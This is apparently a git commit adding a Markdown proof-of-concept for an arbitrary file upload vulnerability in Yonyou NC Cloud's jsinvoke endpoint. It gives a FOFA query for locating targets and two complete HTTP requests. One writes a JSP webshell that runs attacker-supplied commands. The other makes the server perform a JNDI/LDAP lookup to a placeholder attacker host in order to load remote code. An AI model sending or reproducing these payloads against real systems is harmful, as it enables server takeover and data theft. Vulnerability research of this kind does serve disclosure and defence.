Create 用友 NC Cloud jsinvoke 任意文件上传漏洞.md

2023-08-19 20:39:39 +08:00 · 2023-08-19 20:39:39 +08:00 · 6cc2e7e604
commit 6cc2e7e604
parent 8a358bc193
1 changed files with 42 additions and 0 deletions
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@ -0,0 +1,42 @@
+## 用友 NC Cloud jsinvoke 任意文件上传漏洞
+漏洞描述
+用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限
+app="用友-NC-Cloud"
+
+```
+POST /uapjs/jsinvoke/?action=invoke
+Content-Type: application/json
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
+    "webapps/nc_web/407.jsp"
+  ]
+}
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host:
+Connection: Keep-Alive
+Content-Length: 253
+Content-Type: application/x-www-form-urlencoded
+
+{
+  "serviceName": "nc.itf.iufo.IBaseSPService",
+  "methodName": "saveXStreamConfig",
+  "parameterTypes": [
+    "java.lang.Object",
+    "java.lang.String"
+  ],
+  "parameters": [
+    "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}",
+    "webapps/nc_web/301.jsp"
+  ]
+}
+
+```